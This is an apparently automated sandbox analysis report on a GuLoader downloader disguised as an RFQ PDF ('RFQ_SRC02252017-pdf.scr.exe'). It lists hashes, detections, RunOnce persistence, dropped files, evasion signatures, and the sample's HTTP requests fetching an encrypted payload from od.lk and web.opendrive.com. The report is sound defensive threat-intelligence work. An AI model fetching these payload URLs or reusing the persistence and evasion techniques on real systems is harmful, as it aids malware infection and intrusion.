

Windows Analysis Report
RFQ_SRC02252017-pdf.scr.exe

Overview

General Information

Sample name: RFQ_SRC02252017-pdf.scr.exe
Analysis ID: 1617166
MD5: 11f41ca243c031d073ca13d1aa0e9a29
SHA1: ba4eb2a551a053f3f222ce0c5039e5b05cca880e
SHA256: 7a0f824a21b8f5d26bf8536e2f5958514b6975d54722418719c8e919734a3986
Tags: exe, user-threatcat_ch

Detection

GuLoader
Score: 96
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Increases the number of concurrent connections per server for Internet Explorer
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ_SRC02252017-pdf.scr.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe" MD5: 11F41CA243C031D073CA13D1AA0E9A29)
    • RFQ_SRC02252017-pdf.scr.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe" MD5: 11F41CA243C031D073CA13D1AA0E9A29)
      • WerFault.exe (PID: 8028 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 2076 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • microminiaturise.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe" MD5: 11F41CA243C031D073CA13D1AA0E9A29)
    • microminiaturise.exe (PID: 4464 cmdline: "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe" MD5: 11F41CA243C031D073CA13D1AA0E9A29)
      • WerFault.exe (PID: 6108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2096 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Yara matches (Source | Rule | Description | Author):
00000008.00000002.2846924504.0000000005E9B000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000000.00000002.2172873963.0000000005E9B000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: RFQ_SRC02252017-pdf.scr.exe PID: 7308 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security

        System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe, ProcessId: 7724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Befolkningsgruppe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe, ProcessId: 7724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Befolkningsgruppe
Source: Registry Key set | Author: frack113 | Data: Details: 10, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe, ProcessId: 7724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2025-02-17T15:50:59.989171+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49759 | 38.108.185.115 | 443 | TCP
2025-02-17T15:52:05.495068+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50013 | 38.108.185.115 | 443 | TCP


        AV Detection

Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | Virustotal: Detection: 37%
Source: RFQ_SRC02252017-pdf.scr.exe | ReversingLabs: Detection: 27%
Source: RFQ_SRC02252017-pdf.scr.exe | Virustotal: Detection: 37%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ_SRC02252017-pdf.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Directory created: C:\Program Files\Microsoft DN1
Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 38.108.185.71:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 38.108.185.71:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_00405FE2 FindFirstFileA,FindClose,0_2_00405FE2
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559E
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_00402645 FindFirstFileA,0_2_00402645
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 4_2_00402645 FindFirstFileA,4_2_00402645
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 4_2_00405FE2 FindFirstFileA,FindClose,4_2_00405FE2
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 4_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_0040559E
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | File opened: C:\Users\user\AppData\Local
Source: Joe Sandbox View | IP Address: 38.108.185.115
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49759 -> 38.108.185.115:443
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50013 -> 38.108.185.115:443
Source: global traffic | HTTP traffic detected: GET /d/MzdfMzIyNjM2NDFf/DgaYM84.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: od.lk | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&inline=0 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: web.opendrive.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: od.lk
Source: global traffic | DNS traffic detected: DNS query: web.opendrive.com
Source: RFQ_SRC02252017-pdf.scr.exe, microminiaturise.exe.0.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: RFQ_SRC02252017-pdf.scr.exe, microminiaturise.exe.0.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/
Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/J~Z_
Source: microminiaturise.exe, 0000000A.00000002.3338788769.0000000003668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIyNjM2NDFf/DgaYM84.bin
Source: microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/z
Source: microminiaturise.exe, 0000000A.00000003.2994509172.0000000003701000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/
Source: microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/4
Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2316123890.0000000003833000.00000004.00000020.00020000.00000000.sdmp, RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.0000000003833000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/E
Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2304965874.0000000003838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/LMEM
Source: microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994509172.0000000003701000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&in
Source: microminiaturise.exe, 0000000A.00000002.3338788769.00000000036A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0~
Source: microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/aut
Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2304965874.0000000003838000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/u
Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown | Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_00405107 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405107

        System Summary

Source: initial sample | Static PE information: Filename: RFQ_SRC02252017-pdf.scr.exe
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 4_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_00403217
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_00404946
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_004062B8
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 4_2_00404946
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 4_2_004062B8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dll 75ED40311875312617D6711BAED0BE29FCAEE71031CA27A8D308A72B15A51E49
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: String function: 004029FD appears 49 times
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 2076
Source: RFQ_SRC02252017-pdf.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal96.phis.troj.evad.winEXE@8/26@3/2
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_0040440A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040440A
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | File created: C:\Program Files (x86)\Redwing.ini
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4464
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7724
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | File created: C:\Users\user\AppData\Local\Temp\nsu46FA.tmp
Source: RFQ_SRC02252017-pdf.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | File read: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe
Source: unknown | Process created: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe"
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Process created: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe"
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 2076
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe"
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | Process created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe"
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2096
Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe | Sections loaded (in the order reported, repeats included): apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, riched20.dll, usp10.dll, msls31.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll, version.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, netapi32.dll, samcli.dll, uxtheme.dll, devenum.dll, winmm.dll, ntmarta.dll, devobj.dll, msdmo.dll, avicap32.dll, msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | Sections loaded (in the order reported, repeats included): apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, riched20.dll, usp10.dll, msls31.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll, version.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dpapi.dll, msasn1.dll, cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Dandyens138.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior

        Data Obfuscation

        Source: Yara match, File source: Process Memory Space: RFQ_SRC02252017-pdf.scr.exe PID: 7308, type: MEMORYSTR
        Source: Yara match, File source: 00000008.00000002.2846924504.0000000005E9B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000000.00000002.2172873963.0000000005E9B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Code function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Code function: 0_2_10002D40 push eax; ret 0_2_10002D6E
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe File created: C:\Users\user\AppData\Local\Temp\nsp52FE.tmp\System.dll
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dll
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\meike.Pri
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Casablanca.txt
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Dandyens138.ini
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\convenes.ini
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\guslee.lta
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\havearkitekts.jpg
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\inkasseringens.ini
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\konfronter.jpg
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\minirobot.uni
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\straksafskrivningerne.sak
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\unthrift.jpg
